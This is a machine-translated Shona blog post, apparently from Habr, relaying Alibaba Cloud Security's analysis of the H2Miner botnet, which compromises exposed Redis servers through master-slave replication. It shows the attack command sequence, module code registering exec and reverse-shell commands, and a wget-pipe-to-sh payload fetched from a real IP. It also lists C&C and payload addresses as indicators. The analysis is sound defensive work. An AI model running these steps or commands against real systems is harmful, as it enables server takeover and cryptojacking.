Zuva rapfuura, imwe yemaseva eprojekiti yangu yakarwiswa nehonye yakafanana. Mukutsvaga mhinduro kumubvunzo wekuti "chii icho?" Ndakawana chinyorwa chikuru neAlibaba Cloud Security timu. Sezvo ndisina kuwana chinyorwa ichi paHabré, ndafunga kuchishandura kunyanya kwauri <3
kupinda
Munguva pfupi yapfuura, Alibaba Cloud's chengetedzo timu yakawana kamwe kamwe kubuda kweH2Miner. Rudzi urwu rwegonye rine hutsinye rinoshandisa kushaikwa kwemvumo kana asina kusimba mapassword eRedis semasuwo kumasisitimu ako, mushure mezvo inowiriranisa yayo ine hutsinye module nemuranda kuburikidza neatenzi-muranda kuwiriranisa uye pakupedzisira kudhawunirodha iyi yakaipa module kumushini wakarwiswa uye oita zvakaipa. mirayiridzo.
Munguva yakapfuura, kurwiswa kwemasisitimu ako kwainyanya kuitwa uchishandisa nzira inosanganisira akarongwa mabasa kana makiyi eSSH akanyorwa kumushini wako mushure mekunge murwi apinda muRedis. Neraki, iyi nzira haigone kushandiswa kazhinji nekuda kwematambudziko nekutonga kwemvumo kana nekuda kweakasiyana masisitimu shanduro. Nekudaro, iyi nzira yekurodha moduru yakaipa inogona kuita zvakananga mirairo yeanorwisa kana kuwana mukana kune goko, izvo zvine njodzi kune yako system.
Nekuda kwehuwandu hukuru hwemaseva eRedis anogarwa paInternet (anenge miriyoni imwe), timu yekuchengetedza yeAlibaba Cloud, sechiyeuchidzo chine hushamwari, inokurudzira kuti vashandisi vasagovane Redis online uye kugara vachitarisa kusimba kwemapassword avo uye kuti vakakanganiswa. kukurumidza kusarudza.
H2Miner
H2Miner ibhotnet yemugodhi yeLinux-yakavakirwa masisitimu anogona kupinda system yako nenzira dzakasiyana siyana, kusanganisira kushaikwa kwemvumo muHadoop shinda, Docker, uye Redis kure command execution (RCE) kusagadzikana. Botnet inoshanda nekudhawunirodha zvinyorwa zvakashata uye malware kuchera data rako, kuwedzera kurwiswa kwakatwasuka, uye kuchengetedza kuraira uye kutonga (C&C) kutaurirana.
Redis RCE
Zivo pamusoro penyaya iyi yakagoverwa naPavel Toporkov paZeroNights 2018. Mushure meshanduro 4.0, Redis inotsigira plug-in loading feature inopa vashandisi kukwanisa kutakura kuitira kuti mafaira akabatanidzwa neC muRedis aite mirairo chaiyo yeRedis. Iri basa, kunyangwe richibatsira, rine kusagadzikana umo, mune master-muranda modhi, mafaera anogona kuwiriraniswa nemuranda kuburikidza neakazararesync mode. Izvi zvinogona kushandiswa neanorwisa kutamisa zvakashata saka mafaira. Mushure mekutamisa kwapera, vanorwisa vanoisa module pane yakarwiswa Redis muenzaniso uye ita chero kuraira.
Malware Worm Analysis
Munguva pfupi yapfuura, Alibaba Cloud kuchengetedza timu yakaona kuti saizi yeH2Miner yakaipa mugodhi boka yakawedzera zvakanyanya. Maererano nekuongorora, iyo general process yekurwiswa kuitika ndeyekutevera:
H2Miner inoshandisa RCE Redis kurwisa kwakazara. Vapambi vanotanga kurwisa maseva eRedis asina kudzivirirwa kana maseva ane mapassword asina simba.
Vanobva vashandisa murairo config set dbfilename red2.so kushandura zita refaira. Mushure meizvi, vanorwisa vanoita murairo slaveof kuseta iyo master-slave replication host kero.
Kana iyo yakarwiswa Redis chiitiko ichimisa tenzi-muranda kubatana neane hutsinye Redis iri yeanorwisa, anorwisa anotumira iyo ine hutachiona module achishandisa iyo fullresync murairo kuwiriranisa mafaera. Iyo red2.so faira ichabva yatorwa kumushini wakarwiswa. Vanorwisa vanobva vashandisa ./red2.so loading module kurodha iyi so file. Iyo module inogona kuita mirairo kubva kune anorwisa kana kutangisa reverse yekubatanidza (backdoor) kuti uwane mukana kumuchina wakarwiswa.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Mushure mekuita murairo wakashata wakadai se / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, anorwisa anozogadzirisa zita rekuchengetedza faira uye kuburitsa system module kuti achenese matakwa. Nekudaro, iyo red2.so faira icharamba iri pamushini wakarwiswa. Vashandisi vanorayirwa kuti vatarise kuvepo kweiyi faira rekufungidzira mune folda yeRedis yavo muenzaniso.
Pamusoro pekuuraya mamwe maitiro akaipa ekubira zviwanikwa, munhu anorwisa akatevera script yakaipa nekudhawunirodha uye nekuita zvakashata mabhinari mafaera ku. . Izvi zvinoreva kuti zita rekuita kana zita redhairekitori rine kisinging pane iyo host inogona kuratidza kuti muchina uyu wakabatwa nehutachiona uhu.
Zvinoenderana nereverse engineering mhedzisiro, iyo malware inonyanya kuita zvinotevera mabasa:
- Kuisa mafaira uye kuaita
- Kuchera
- Kuchengetedza kutaurirana kweC&C uye kuita mirairo yevanorwisa
Shandisa masscan yekunze scanning kuti uwedzere pesvedzero yako. Mukuwedzera, iyo IP kero yeC & C server yakaoma-coded muchirongwa, uye murwi anorwiswa achataurirana neC & C yekukurukurirana server achishandisa zvikumbiro zveHTTP, apo ruzivo rwe zombie (compromised server) runowanikwa mumusoro weHTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Dzimwe nzira dzekurwisa
Kero uye ma link anoshandiswa negonye
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Kutanga, Redis haifanirwe kuwanikwa kubva kuInternet uye inofanirwa kuchengetedzwa nepassword yakasimba. Izvo zvakakoshawo kuti vatengi vatarise kuti hapana red2.so faira muRedis dhairekitori uye kuti hapana "kinsing" mufaira / process zita pane iyo host.
Source: www.habr.com